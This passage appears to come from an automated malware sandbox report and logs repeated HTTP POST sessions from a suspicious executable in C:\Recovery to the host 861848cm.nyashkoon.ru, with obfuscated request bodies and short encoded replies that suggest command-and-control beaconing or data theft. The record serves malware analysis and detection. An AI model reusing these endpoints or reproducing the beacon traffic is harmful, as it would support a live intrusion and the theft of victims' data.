                                                                    Nov 6, 2024 03:37:23.592039108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:23.665405989 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 58 3f 03 2d 01 30 05 38 18 29 2e 25 13 3c 09 3b 5f 3b 32 0a 59 2a 1d 23 00 3e 01 3c 55 37 06 33 17 22 0c 3d 5b 20 32 20 07 3f 01 21 5f 05 1d 3a 06 33 07 06 56 3e 22 3a 5c 29 0e 33 1b 32 20 3b 18 3d 28 29 05 34 04 3e 55 26 3d 3d 59 25 0c 2c 08 3f 37 3a 04 2c 3f 2c 0e 25 00 2a 57 09 16 23 09 27 23 09 13 3e 1f 3f 59 24 10 31 5f 25 14 20 0c 2a 05 23 5d 37 24 04 5e 29 20 24 03 35 37 3a 59 27 29 3d 1a 32 10 2b 53 29 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: X?-08).%<;_;2Y*#><U73"=[ 2 ?!_:3V>":\)32 ;=()4>U&==Y%,?7:,?,%*W#'#>?Y$1_% *#]7$^) $57:Y')=2+S)"&U" T0]O


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.4 | 49748 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:22.929759979 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:23.282084942 CET | 1012 | OUT | Data Raw: 56 51 5a 54 53 5a 55 59 5a 5f 52 51 54 58 5b 5e 55 52 59 59 51 50 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQZTSZUYZ_RQTX[^URYYQPR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%]8/R=;?(3Z*:"*-_3^;4?%)-,:&?!$.&9'X$.Q-.
                                                                    Nov 6, 2024 03:37:23.739573956 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:23.809732914 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.4 | 49749 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:24.428978920 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:24.781956911 CET | 1012 | OUT | Data Raw: 56 5f 5f 5f 53 5f 50 53 5a 5f 52 51 54 5e 5b 5b 55 50 59 57 51 52 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V___S_PSZ_RQT^[[UPYWQRRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%]8?6(0+3;*\1[*.>0;77,&?,.&3!72X1'X$.Q-6
                                                                    Nov 6, 2024 03:37:25.241245031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:25.316793919 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.4 | 49751 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:25.439796925 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:25.797646046 CET | 1012 | OUT | Data Raw: 56 57 5a 5c 56 5f 50 5f 5a 5f 52 51 54 59 5b 5a 55 55 59 5c 51 54 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VWZ\V_P_Z_RQTY[ZUUY\QTRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8?>S?8Y?0 **-^3<X &+-+:?#=')'X$.Q-*
                                                                    Nov 6, 2024 03:37:26.250081062 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:26.324264050 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.4 | 49752 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:26.484267950 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:26.830780029 CET | 1008 | OUT | Data Raw: 56 53 5a 5c 56 5d 55 58 5a 5f 52 51 54 5a 5b 5d 55 57 59 5e 51 50 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VSZ\V]UXZ_RQTZ[]UWY^QPR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^;&R=;8]??*9=Z)!';(Z",1<-3.54'1'X$.Q-
                                                                    Nov 6, 2024 03:37:27.287305117 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:27.364610910 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    12 | 192.168.2.4 | 49753 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:27.486308098 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:28.298870087 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:28.371457100 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    13 | 192.168.2.4 | 49754 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:28.502032995 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    14 | 192.168.2.4 | 49755 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:28.693620920 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:29.504090071 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:29.574538946 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    15 | 192.168.2.4 | 49756 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:28.861772060 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:29.680751085 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:29.754108906 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    16 | 192.168.2.4 | 49757 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:30.071151972 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:30.884957075 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:30.958198071 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    17 | 192.168.2.4 | 49758 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:31.095452070 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:31.896694899 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:31.966439009 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    18 | 192.168.2.4 | 49759 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:32.411256075 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:33.214185953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:33.294085026 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    19 | 192.168.2.4 | 49760 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:33.438777924 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:34.248665094 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:34.328052998 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    20 | 192.168.2.4 | 49761 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:34.485840082 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    21 | 192.168.2.4 | 49762 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:34.607675076 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:35.428045034 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:35.498843908 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    22 | 192.168.2.4 | 49763 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:35.270493031 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:36.097726107 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:36.167656898 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    23 | 192.168.2.4 | 49764 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:36.299118996 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:37.117599010 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:37.190800905 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    24 | 192.168.2.4 | 49765 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:38.151451111 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:38.973120928 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:39.052670002 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    25 | 192.168.2.4 | 49766 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:39.175318003 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:39.531972885 CET | 1012 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:39.988178968 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:40.059659004 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    26 | 192.168.2.4 | 49767 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:40.528902054 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    27 | 192.168.2.4 | 49768 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:40.929636002 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:41.282001019 CET | 1012 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:41.738755941 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:41.816730022 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    28 | 192.168.2.4 | 49769 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:41.945715904 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:42.297751904 CET | 1012 | OUT | (request body)
                                                                    Nov 6, 2024 03:37:42.757407904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:42.831504107 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    29 | 192.168.2.4 | 49770 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:37:43.266388893 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
